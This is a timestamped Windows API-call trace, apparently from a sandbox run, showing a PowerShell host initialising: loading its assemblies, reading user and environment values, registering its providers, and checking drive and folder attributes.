	[0539.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.493] CoTaskMemAlloc (cb=0x804) returned 0x1b708ae0
	[0539.493] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b708ae0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0539.493] CoTaskMemFree (pv=0x1b708ae0) 
	[0539.493] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0539.493] GetUserNameW (in: lpBuffer=0x3838e0, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0539.493] CoTaskMemFree (pv=0x3838e0) 
	[0539.494] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3586480*="Environment", lpRawData=0x3586210) returned 1
	[0539.495] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0539.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0539.495] CoTaskMemFree (pv=0x1b6e49c0) 
	[0539.496] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0539.496] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0539.496] CoTaskMemFree (pv=0x1b6e49c0) 
	[0539.496] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0539.496] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0539.496] CoTaskMemFree (pv=0x1b6e49c0) 
	[0539.497] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1ecdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0539.497] SetErrorMode (uMode=0x1) returned 0x1
	[0539.497] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ecfe0 | out: lpFileInformation=0x1ecfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0539.497] SetErrorMode (uMode=0x1) returned 0x1
	[0539.498] GetLogicalDrives () returned 0x4
	[0539.499] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0539.500] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0539.500] SetErrorMode (uMode=0x1) returned 0x1
	[0539.501] CoTaskMemAlloc (cb=0x68) returned 0x3eb290
	[0539.501] CoTaskMemAlloc (cb=0x68) returned 0x3eb220
	[0539.501] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3eb290, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1ecfb0, lpMaximumComponentLength=0x1ecfac, lpFileSystemFlags=0x1ecfa8, lpFileSystemNameBuffer=0x3eb220, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ecfb0*=0x9c354b42, lpMaximumComponentLength=0x1ecfac*=0xff, lpFileSystemFlags=0x1ecfa8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0539.501] CoTaskMemFree (pv=0x3eb290) 
	[0539.501] CoTaskMemFree (pv=0x3eb220) 
	[0539.501] SetErrorMode (uMode=0x1) returned 0x1
	[0539.501] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0539.502] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1eccf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0539.502] SetErrorMode (uMode=0x1) returned 0x1
	[0539.502] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ecf50 | out: lpFileInformation=0x1ecf50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0539.502] SetErrorMode (uMode=0x1) returned 0x1
	[0539.503] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1eccf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0539.503] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0539.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0539.503] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecad0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0539.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0539.504] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0539.504] SetErrorMode (uMode=0x1) returned 0x1
	[0539.504] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ecd80 | out: lpFileInformation=0x1ecd80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0539.504] SetErrorMode (uMode=0x1) returned 0x1
	[0539.504] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0539.505] SetErrorMode (uMode=0x1) returned 0x1
	[0539.505] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ecd80 | out: lpFileInformation=0x1ecd80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0539.505] SetErrorMode (uMode=0x1) returned 0x1
	[0539.505] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecbc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0539.505] SetErrorMode (uMode=0x1) returned 0x1
	[0539.505] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ece20 | out: lpFileInformation=0x1ece20*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0539.505] SetErrorMode (uMode=0x1) returned 0x1
	[0539.506] CoTaskMemAlloc (cb=0x804) returned 0x1b708ae0
	[0539.506] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b708ae0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0539.507] CoTaskMemFree (pv=0x1b708ae0) 
	[0539.507] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0539.507] GetUserNameW (in: lpBuffer=0x3838e0, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0539.507] CoTaskMemFree (pv=0x3838e0) 
	[0539.508] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x358d570*="FileSystem", lpRawData=0x358d300) returned 1
	[0539.509] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0539.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0539.509] CoTaskMemFree (pv=0x1b6e49c0) 
	[0539.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.511] CoTaskMemAlloc (cb=0x804) returned 0x1b708ae0
	[0539.511] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b708ae0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0539.511] CoTaskMemFree (pv=0x1b708ae0) 
	[0539.511] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0539.511] GetUserNameW (in: lpBuffer=0x3838e0, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0539.512] CoTaskMemFree (pv=0x3838e0) 
	[0539.512] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3592db0*="Function", lpRawData=0x3592b40) returned 1
	[0539.515] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0539.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0539.515] CoTaskMemFree (pv=0x1b6e49c0) 
	[0540.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.587] CoTaskMemAlloc (cb=0x804) returned 0x1b708ae0
	[0540.587] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b708ae0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0541.557] CoTaskMemFree (pv=0x1b708ae0) 
	[0541.557] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0541.558] GetUserNameW (in: lpBuffer=0x3838e0, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0541.558] CoTaskMemFree (pv=0x3838e0) 
	[0541.558] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35b55d8*="Registry", lpRawData=0x35b5368) returned 1
	[0542.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0542.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0542.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0542.404] CoTaskMemAlloc (cb=0x804) returned 0x1b708ae0
	[0542.404] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b708ae0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0542.404] CoTaskMemFree (pv=0x1b708ae0) 
	[0542.404] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0542.404] GetUserNameW (in: lpBuffer=0x3838e0, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0542.405] CoTaskMemFree (pv=0x3838e0) 
	[0542.405] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35ba9f0*="Variable", lpRawData=0x35ba780) returned 1
	[0542.411] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0542.411] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0542.411] CoTaskMemFree (pv=0x1b6e49c0) 
	[0542.414] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0542.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0542.414] CoTaskMemFree (pv=0x1b6e49c0) 
	[0542.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ecad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0542.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0542.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0542.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0543.436] CoTaskMemAlloc (cb=0x804) returned 0x1b708ae0
	[0543.436] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b708ae0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0543.437] CoTaskMemFree (pv=0x1b708ae0) 
	[0543.437] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0543.437] GetUserNameW (in: lpBuffer=0x3838e0, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0543.437] CoTaskMemFree (pv=0x3838e0) 
	[0543.438] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35ce608*="Certificate", lpRawData=0x35ce398) returned 1
	[0543.608] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0543.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.608] CoTaskMemFree (pv=0x1b6e49c0) 
	[0543.611] GetLogicalDrives () returned 0x4
	[0543.611] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1eceb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0543.611] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0543.612] CoTaskMemAlloc (cb=0x20e) returned 0x3d3f70
	[0543.612] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3d3f70 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0543.613] CoTaskMemFree (pv=0x3d3f70) 
	[0543.614] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0543.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.614] CoTaskMemFree (pv=0x1b6e49c0) 
	[0543.614] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0543.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.614] CoTaskMemFree (pv=0x1b6e49c0) 
	[0544.489] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0544.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.490] CoTaskMemFree (pv=0x1b6e49c0) 
	[0544.491] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0544.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.491] CoTaskMemFree (pv=0x1b6e49c0) 
	[0544.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0544.492] SetErrorMode (uMode=0x1) returned 0x1
	[0544.492] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece70 | out: lpFileInformation=0x1ece70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0544.492] SetErrorMode (uMode=0x1) returned 0x1
	[0544.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0544.492] SetErrorMode (uMode=0x1) returned 0x1
	[0544.492] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece70 | out: lpFileInformation=0x1ece70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0544.492] SetErrorMode (uMode=0x1) returned 0x1
	[0544.493] CoTaskMemAlloc (cb=0x104) returned 0x1b6e49c0
	[0544.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e49c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.493] CoTaskMemFree (pv=0x1b6e49c0) 
	[0544.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0544.495] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecc20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0544.495] SetErrorMode (uMode=0x1) returned 0x1
	[0544.496] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ece30 | out: lpFileInformation=0x1ece30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0544.496] SetErrorMode (uMode=0x1) returned 0x1
	[0544.496] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecc20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0544.496] SetErrorMode (uMode=0x1) returned 0x1
	[0544.496] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ece30 | out: lpFileInformation=0x1ece30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0544.496] SetErrorMode (uMode=0x1) returned 0x1
	[0544.496] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecc30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0544.496] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0544.496] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0544.497] SetErrorMode (uMode=0x1) returned 0x1
	[0544.497] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ece30 | out: lpFileInformation=0x1ece30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0544.497] SetErrorMode (uMode=0x1) returned 0x1
	[0544.497] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0544.497] SetErrorMode (uMode=0x1) returned 0x1
	[0544.497] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ece30 | out: lpFileInformation=0x1ece30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0544.497] SetErrorMode (uMode=0x1) returned 0x1
	[0544.497] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
